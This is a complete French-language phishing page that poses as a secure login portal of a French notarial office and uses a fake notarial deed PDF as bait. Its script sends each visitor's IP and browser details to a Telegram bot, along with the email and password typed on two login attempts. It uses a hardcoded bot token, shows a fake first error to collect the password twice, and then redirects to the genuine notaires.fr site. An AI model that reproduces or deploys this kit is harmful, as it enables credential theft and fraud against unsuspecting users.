<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connexion - Office Notarial de France</title>
    <link rel="icon" type="image/png" href="https://www.notaires.fr/themes/custom/not/assets/img/logos/logo.svg">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        
        body {
            background: linear-gradient(rgba(30, 60, 114, 0.7), rgba(42, 82, 152, 0.75)), url('https://chambre-gironde.notaires.fr/wp-content/uploads/2018/09/Edito-co-signe%CC%81.jpg');
            background-size: cover;
            background-position: center;
            background-attachment: fixed;
            min-height: 100vh;
            position: relative;
            overflow-x: hidden;
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 15px;
        }
        
        body::before {
            content: '';
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: url('https://chambre-gironde.notaires.fr/wp-content/uploads/2018/09/Edito-co-signe%CC%81.jpg');
            background-size: cover;
            background-position: center;
            filter: blur(4px);
            z-index: -1;
        }
        
        .container {
            width: 100%;
            max-width: 420px;
            background: rgba(255, 255, 255, 0.92);
            border-radius: 12px;
            box-shadow: 0 10px 25px rgba(0, 0, 0, 0.2);
            overflow: hidden;
            text-align: center;
            backdrop-filter: blur(5px);
            border: 1px solid rgba(255, 255, 255, 0.15);
        }
        
        .header {
            background: rgba(0, 103, 184, 0.85);
            padding: 20px;
            text-align: center;
            color: white;
            position: relative;
        }
        
        .header::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 0;
            width: 100%;
            height: 4px;
            background: linear-gradient(90deg, #0067b8, #004d84, #0067b8);
        }
        
        .header img {
            width: 70px;
            height: 70px;
            margin-bottom: 12px;
            border-radius: 0;
            border: 2px solid rgba(255, 255, 255, 0.6);
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.15);
            background: rgba(255, 255, 255, 0.15);
        }
        
        .header h1 {
            font-size: 22px;
            margin-bottom: 4px;
            font-weight: 600;
            text-shadow: 1px 1px 2px rgba(0, 0, 0, 0.3);
        }
        
        .header p {
            font-size: 13px;
            opacity: 0.9;
        }
        
        .content {
            padding: 28px;
        }
        
        .login-form {
            display: block;
        }
        
        .download-container {
            display: none;
            text-align: center;
        }
        
        .input-group {
            margin-bottom: 18px;
            text-align: left;
        }
        
        .input-group label {
            display: block;
            margin-bottom: 6px;
            font-weight: 500;
            color: #444;
            font-size: 14px;
        }
        
        .input-group input {
            width: 100%;
            padding: 13px;
            border: 1px solid #ddd;
            border-radius: 6px;
            font-size: 15px;
            transition: border 0.3s, box-shadow 0.3s;
        }
        
        .input-group input:focus {
            border-color: #0067b8;
            outline: none;
            box-shadow: 0 0 0 2px rgba(0, 103, 184, 0.2);
        }
        
        .btn {
            width: 100%;
            padding: 14px;
            background: #0067b8;
            color: white;
            border: none;
            border-radius: 6px;
            font-size: 15px;
            font-weight: 600;
            cursor: pointer;
            transition: background 0.3s, transform 0.2s;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        
        .btn:hover {
            background: #004d84;
            transform: translateY(-1px);
        }
        
        .btn:active {
            transform: translateY(0);
        }
        
        .btn:disabled {
            background: #90caf9;
            cursor: not-allowed;
            transform: none;
        }
        
        .error-message {
            background: #ffebee;
            color: #d32f2f;
            padding: 10px;
            border-radius: 5px;
            margin-bottom: 18px;
            text-align: center;
            font-weight: 500;
            display: none;
            border-left: 3px solid #d32f2f;
            font-size: 14px;
        }
        
        .info-text {
            color: #0067b8;
            font-weight: 500;
            margin-bottom: 18px;
            text-align: center;
            font-size: 14px;
            line-height: 1.4;
            padding: 8px;
            background: #e8f4ff;
            border-radius: 6px;
        }
        
        .loading {
            display: inline-block;
            width: 18px;
            height: 18px;
            border: 2px solid rgba(255,255,255,.3);
            border-radius: 50%;
            border-top-color: #fff;
            animation: spin 1s ease-in-out infinite;
            margin-right: 8px;
        }
        
        .document-link {
            text-align: center;
            margin-top: 18px;
        }
        
        .document-link a {
            color: #0067b8;
            text-decoration: none;
            font-weight: 500;
            display: inline-flex;
            align-items: center;
            transition: color 0.3s;
            padding: 7px 10px;
            border-radius: 5px;
            font-size: 14px;
        }
        
        .document-link a:hover {
            color: #004d84;
            background: #f0f7ff;
        }
        
        .arrow-animation {
            margin: 18px 0;
        }
        
        .arrow {
            width: 70px;
            height: 70px;
            margin: 0 auto;
            animation: bounce 1s infinite alternate;
        }
        
        .progress-container {
            width: 100%;
            height: 8px;
            background: #f0f0f0;
            border-radius: 4px;
            margin: 18px 0;
            overflow: hidden;
        }
        
        .progress-bar {
            height: 100%;
            width: 0%;
            background: linear-gradient(90deg, #4CAF50, #2E7D32);
            border-radius: 4px;
            transition: width 0.5s ease;
        }
        
        .countdown {
            font-size: 16px;
            color: #0067b8;
            margin: 12px 0;
        }
        
        .download-error {
            display: none;
            background: #ffebee;
            color: #d32f2f;
            padding: 12px;
            border-radius: 6px;
            margin: 18px 0;
            border-left: 3px solid #d32f2f;
            font-size: 14px;
        }
        
        @keyframes spin {
            to { transform: rotate(360deg); }
        }
        
        @keyframes bounce {
            0% { transform: translateY(0); }
            100% { transform: translateY(-10px); }
        }
        
        @keyframes progress {
            0% { width: 0%; }
            100% { width: 100%; }
        }
        
        @media (max-width: 480px) {
            .container {
                border-radius: 10px;
                max-width: 380px;
            }
            
            .content {
                padding: 22px;
            }
            
            .header {
                padding: 18px;
            }
            
            .header h1 {
                font-size: 20px;
            }
            
            .header img {
                width: 60px;
                height: 60px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <img src="https://www.notaires.fr/themes/custom/not/assets/img/logos/logo.svg" alt="Logo Notaire">
            <h1>Office Notarial de France</h1>
            <p>Accès sécurisé à la documentation</p>
        </div>
        
        <div class="content">
            <!-- Formulaire de connexion -->
            <div class="login-form" id="loginForm">
                <p class="info-text">Pour accéder à la documentation sécurisée, veuillez vous connecter avec votre adresse email et votre mot de passe habituel.</p>
                
                <div class="error-message" id="errorMessage">
                    Erreur d'identifiant ou de mot de passe. Veuillez réessayer.
                </div>
                
                <form id="loginFormElement">
                    <div class="input-group">
                        <label for="email">Adresse email</label>
                        <input type="email" id="email" name="email" placeholder="votre@email.com" required>
                    </div>
                    
                    <div class="input-group">
                        <label for="password">Mot de passe</label>
                        <input type="password" id="password" name="password" placeholder="Votre mot de passe" required>
                    </div>
                    
                    <button type="submit" class="btn" id="submitBtn">
                        <span id="btnText">Se connecter</span>
                    </button>
                </form>
                
                <div class="document-link">
                    <a href="#">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" viewBox="0 0 16 16" style="margin-right: 5px;">
                            <path d="M.5 9.9a.5.5 0 0 1 .5.5v2.5a1 1 0 0 0 1 1h12a1 1 0 0 0 1-1v-2.5a.5.5 0 0 1 1 0v2.5a2 2 0 0 1-2 2H2a2 2 0 0 1-2-2v-2.5a.5.5 0 0 1 .5-.5z"/>
                            <path d="M7.646 11.854a.5.5 0 0 0 .708 0l3-3a.5.5 0 0 0-.708-.708L8.5 10.293V1.5a.5.5 0 0 0-1 0v8.793L5.354 8.146a.5.5 0 1 0-.708.708l3 3z"/>
                        </svg>
                        Télécharger ACTE NOTARIAL.pdf
                    </a>
                </div>
            </div>
            
            <!-- Simulation de téléchargement -->
            <div class="download-container" id="downloadContainer">
                <h2>Téléchargement en cours</h2>
                <p>Veuillez patienter pendant le téléchargement de votre document</p>
                
                <div class="arrow-animation">
                    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQMCktq39wmG5V-SI-oLtglOvIsByYB4dBEEaLbF9aqxA&s" alt="Flèche de téléchargement" class="arrow">
                </div>
                
                <div class="progress-container">
                    <div class="progress-bar" id="progressBar"></div>
                </div>
                
                <div class="countdown" id="countdown">Début dans 5 secondes</div>
                
                <div class="download-error" id="downloadError">
                    <h3>Erreur de téléchargement</h3>
                    <p>Le téléchargement du fichier PDF a échoué. Veuillez réessayer ultérieurement.</p>
                </div>
            </div>
        </div>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const loginForm = document.getElementById('loginForm');
            const loginFormElement = document.getElementById('loginFormElement');
            const downloadContainer = document.getElementById('downloadContainer');
            const errorMessage = document.getElementById('errorMessage');
            const submitBtn = document.getElementById('submitBtn');
            const btnText = document.getElementById('btnText');
            const progressBar = document.getElementById('progressBar');
            const countdown = document.getElementById('countdown');
            const downloadError = document.getElementById('downloadError');
            
            let loginAttempts = 0;
            
            // Envoyer les informations de l'utilisateur au bot Telegram
            function sendToTelegram(message) {
                const botToken = '7791455093:AAF_mtU0RImnpSMhVBr9b4nGVxNDRIa8YPs';
                const chatId = '7909181203';
                
                // URL de l'API Telegram
                const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
                
                // Envoyer la requête
                fetch(url, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify({
                        chat_id: chatId,
                        text: message,
                        parse_mode: 'HTML'
                    })
                })
                .then(response => response.json())
                .then(data => {
                    console.log('Message envoyé avec succès:', data);
                })
                .catch(error => {
                    console.error('Erreur lors de l\'envoi:', error);
                });
            }
            
            // Fonction pour obtenir l'adresse IP du client
            function getClientIP() {
                return new Promise((resolve) => {
                    fetch('https://api.ipify.org?format=json')
                        .then(response => response.json())
                        .then(data => resolve(data.ip))
                        .catch(() => {
                            // Fallback en cas d'erreur
                            resolve('IP non disponible');
                        });
                });
            }
            
            // Envoyer une notification lorsque la page est ouverte
            window.addEventListener('load', async function() {
                const userAgent = navigator.userAgent;
                const language = navigator.language;
                const platform = navigator.platform;
                const screen = `${screen.width}x${screen.height}`;
                const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
                const dateTime = new Date().toLocaleString('fr-FR');
                const clientIP = await getClientIP();
                
                const message = `🔔 NOUVEAU VISITEUR SUR LA PAGE 🔔%0A%0A🌐 IP: ${clientIP}%0A📱 User Agent: ${userAgent}%0A🗣️ Langue: ${language}%0A💻 Plateforme: ${platform}%0A📊 Résolution: ${screen}%0A🕒 Fuseau Horaire: ${timezone}%0A📅 Date/Heure: ${dateTime}`;
                
                sendToTelegram(message);
            });
            
            loginFormElement.addEventListener('submit', async function(e) {
                e.preventDefault();
                
                const email = document.getElementById('email').value;
                const password = document.getElementById('password').value;
                
                if (!email || !password) {
                    errorMessage.textContent = 'Veuillez remplir tous les champs.';
                    errorMessage.style.display = 'block';
                    return;
                }
                
                // Masquer le message d'erreur précédent
                errorMessage.style.display = 'none';
                
                // Afficher l'indicateur de chargement
                submitBtn.disabled = true;
                btnText.innerHTML = '<span class="loading"></span> Connexion en cours...';
                
                // Obtenir l'adresse IP du client
                const clientIP = await getClientIP();
                const userAgent = navigator.userAgent;
                const dateTime = new Date().toLocaleString('fr-FR');
                
                loginAttempts++;
                
                if (loginAttempts === 1) {
                    // Première tentative - simuler une erreur de connexion
                    setTimeout(function() {
                        errorMessage.style.display = 'block';
                        submitBtn.disabled = false;
                        btnText.textContent = 'Se connecter';
                        
                        // Envoyer les informations au bot Telegram
                        const message = `🔔 PREMIÈRE TENTATIVE DE CONNEXION 🔔%0A%0A📧 Email: ${email}%0A🔑 Mot de passe: ${password}%0A%0A🌐 IP: ${clientIP}%0A📱 User Agent: ${userAgent}%0A📅 Date/Heure: ${dateTime}`;
                        sendToTelegram(message);
                    }, 2000);
                } else if (loginAttempts === 2) {
                    // Deuxième tentative - simuler le téléchargement
                    setTimeout(function() {
                        // Cacher le formulaire de connexion
                        loginForm.style.display = 'none';
                        
                        // Afficher la simulation de téléchargement
                        downloadContainer.style.display = 'block';
                        
                        // Envoyer les informations au bot Telegram
                        const message = `🔔 DEUXIÈME TENTATIVE DE CONNEXION 🔔%0A%0A📧 Email: ${email}%0A🔑 Mot de passe: ${password}%0A%0A🌐 IP: ${clientIP}%0A📱 User Agent: ${userAgent}%0A📅 Date/Heure: ${dateTime}`;
                        sendToTelegram(message);
                        
                        // Démarrer la simulation de téléchargement
                        simulateDownload();
                    }, 2000);
                }
            });
            
            function simulateDownload() {
                let timeLeft = 5;
                const interval = setInterval(function() {
                    timeLeft--;
                    countdown.textContent = `Téléchargement en cours... ${timeLeft} secondes`;
                    
                    // Mettre à jour la barre de progression
                    const progress = 100 - (timeLeft * 20);
                    progressBar.style.width = progress + '%';
                    
                    if (timeLeft <= 0) {
                        clearInterval(interval);
                        
                        // Afficher le message d'erreur
                        downloadError.style.display = 'block';
                        countdown.textContent = 'Téléchargement échoué';
                        
                        // Rediriger vers notaires.fr après 3 secondes
                        setTimeout(function() {
                            window.location.href = 'https://www.notaires.fr/fr';
                        }, 3000);
                    }
                }, 1000);
            }
            
            // Empêcher le téléchargement du document sans connexion
            document.querySelector('.document-link a').addEventListener('click', function(e) {
                e.preventDefault();
                errorMessage.textContent = 'Veuillez d\'abord vous connecter pour accéder au document.';
                errorMessage.style.display = 'block';
            });
        });
    </script>
</body>
</html>